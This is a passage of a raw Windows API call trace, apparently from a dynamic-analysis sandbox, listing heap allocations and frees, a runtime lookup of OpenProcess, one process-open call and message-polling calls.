RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b72e0 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b73b8 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7220 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7358 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7100 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b73a0 [0203.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7328 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7298 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b72b0 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b71a8 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7340 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7310 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7280 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b72f8 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7130 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7178 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7370 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7238 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7388 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300310 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7148 [0203.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effb0 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70e8 [0203.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7250 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0070 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7190 [0203.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0070 | out: hHeap=0x12c0000) returned 1 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7208 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effe0 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7268 [0203.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71c0 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff40 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71d8 [0203.217] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b71f0 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00a0 [0203.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b72c8 [0203.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b73d0 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0040 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b74f0 [0203.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0040 | out: hHeap=0x12c0000) returned 1 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75b0 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff70 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75f8 [0203.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff70 | out: hHeap=0x12c0000) returned 1 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7538 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff90 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76b8 [0203.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff90 | out: hHeap=0x12c0000) returned 1 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0203.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300310 | out: hHeap=0x12c0000) returned 1 [0203.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7490 [0203.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00a0 [0203.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff70 [0203.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7400 [0203.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff70 | out: hHeap=0x12c0000) returned 1 [0203.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7400 | out: hHeap=0x12c0000) returned 1 [0203.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0070 [0203.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7610 [0203.219] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7628 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff10 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7640 [0203.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7628 | out: hHeap=0x12c0000) returned 1 [0203.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff10 | out: hHeap=0x12c0000) returned 1 [0203.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7640 | out: hHeap=0x12c0000) returned 1 [0203.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff50 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effe0 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7628 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff50 [0203.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7400 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7628 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff50 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7400 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00b0 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7670 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0060 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00a0 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7670 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0060 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efff0 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff70 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00c0 [0203.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0203.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff70 | out: hHeap=0x12c0000) returned 1 [0203.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.222] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0203.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7688 [0203.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff40 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0203.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b74a8 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OpenProcess", cchWideChar=12, lpMultiByteStr=0x14b74a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenProcess", lpUsedDefaultChar=0x0) returned 12 [0203.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74a8 | out: hHeap=0x12c0000) returned 1 [0203.223] GetProcAddress (hModule=0x74650000, lpProcName="OpenProcess") returned 0x74668bf0 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7688 | out: hHeap=0x12c0000) returned 1 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0203.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000e0 [0203.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efee0 [0203.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00c0 [0203.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0010 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efee0 | out: hHeap=0x12c0000) returned 1 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0010 | out: hHeap=0x12c0000) returned 1 [0203.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000e0 | out: hHeap=0x12c0000) returned 1 [0203.223] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x10cc) returned 0x2b4 [0203.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00a0 [0203.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1313d88 [0203.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7628 [0203.267] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7400 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b74a8 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff00 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74a8 | out: hHeap=0x12c0000) returned 1 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff00 | out: hHeap=0x12c0000) returned 1 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7520 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0203.268] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effd0 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effd0 | out: hHeap=0x12c0000) returned 1 [0203.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0203.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7640 [0203.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0000 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7640 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0203.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7658 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0030 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7640 | out: hHeap=0x12c0000) returned 1 [0203.269] FreeLibrary (hLibModule=0x74650000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00b0 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efff0 | out: hHeap=0x12c0000) returned 1 [0203.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7610 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0070 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70e8 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7148 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7190 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7250 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7268 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7208 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71d8 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71c0 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72c8 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71f0 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74f0 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73d0 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75f8 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75b0 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76b8 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7538 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7490 | out: hHeap=0x12c0000) returned 1 [0203.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ec0 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fe0 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7040 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f50 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f38 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e00 | out: hHeap=0x12c0000) returned 1 [0203.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6de8 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e18 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e48 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ea8 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7160 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70d0 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7118 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72e0 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7220 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73b8 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7358 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73a0 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7100 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7328 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72b0 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7298 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71a8 | out: hHeap=0x12c0000) returned 1 [0203.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7310 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7340 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7280 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72f8 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7130 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7370 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7178 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7238 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7388 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132cf00 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0090 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7400 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7520 | out: hHeap=0x12c0000) returned 1 [0203.273] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0203.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7628 | out: hHeap=0x12c0000) returned 1 [0203.274] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1313d88 | out: hHeap=0x12c0000) returned 1 [0203.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.274] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) 